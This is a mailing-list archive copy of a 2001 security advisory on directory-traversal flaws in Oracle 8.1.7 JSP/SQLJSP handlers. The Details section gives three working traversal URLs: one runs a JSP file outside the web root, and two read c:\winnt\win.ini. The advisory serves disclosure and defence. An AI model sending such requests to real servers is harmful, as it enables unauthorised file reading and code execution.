OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Steve (steveSECURESOLUTIONS.ORG)
Date: Mon Jan 22 2001 - 14:44:04 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----Original Message-----
    From: Georgi Guninski
    Sent: Monday, January 22, 2001 7:21 AM
    Subject: Oracle JSP/SQLJS handlers allow viewing files and executing JSP
    outside the web root

    Georgi Guninski security advisory #36, 2001

    Oracle JSP/SQLJS handlers allow viewing files and executing JSP outside the
    web root

    Systems affected:
    Oracle JSP/SQLJP handlers, installed by default Oracle 8.1.7 Windows 2000
    Have not tested on other versions but they may be vulnerable

    Risk: High
    Date: 22 January 2001

    Legal Notice:
    This Advisory is Copyright (c) 2001 Georgi Guninski. You may distribute it
    unmodified.
    You may not modify it and distribute it or distribute parts of it without
    the author's
    written permission.

    Disclaimer:
    The opinions expressed in this advisory and program are my own and not of
    any company.
    The usual standard disclaimer applies, especially the fact that Georgi
    Guninski
    is not liable for any damages caused by direct or indirect use of the
    information
    or functionality provided by this advisory or program.
    Georgi Guninski bears no responsibility for content or misuse of this
    advisory or program or
    any derivatives thereof.

    Description:
    It is possible to view files outside the web root.
    Also possible is execution of .JSP files outside the web root in the same
    partiotion as
    the web server's root.

    Details:
    I guess there are at least 2 vulnerabilities with JSP/SQLJSP handlers.
    Basically these are directory traversal vulnerabilities.
    1) The following URL:
    ---------------------------------------
    http://oraclehost/servlet//..//../o.jsp
    ---------------------------------------
    will execute c:\o.jsp if there is such file.
    As a side effect this shall create the directory C:\servlet\_pages\_servlet
    and shall put
    in it the java source and .class file of o.jsp

    2) The following URL:
    -------------------------------------------------------------
    http://oraclehost/a.jsp//..//..//..//..//..//../winnt/win.ini
    -------------------------------------------------------------
    shall read c:\winnt\win.ini. It is normal to receive an error to this
    request. To see the result
    go to: http://oraclehost/_pages and look in the directories for .java files
    containing "win"

    3) The following URL:
    -----------------------------------------------------------------
    http://oraclehost/bb.sqljsp//..//..//..//..//..//../winnt/win.ini
    -----------------------------------------------------------------
    shall read c:\winnt\win.ini. It is normal to receive an error to this
    request. To see the result
    go to: http://oraclehost/_pages and look in the directories for .java files
    containing "win"

    Note: all urls were tested with Netscape 4.76 or direct HTTP requests. Do
    not work with IE.

    Vendor status:
    Oracle was contacted on 18 January 2001.

    Regards,
    Georgi Guninski
    http://www.guninski.com
    ----------------------
    You may visit Guninski Security Mailing List page at
    http://www.guninski.com/mailinglist.html
    ----------------------

    _____________________________________________________________________
    ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
    ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
    SEND ALL COMMANDS TO: listservlistserv.ntsecurity.net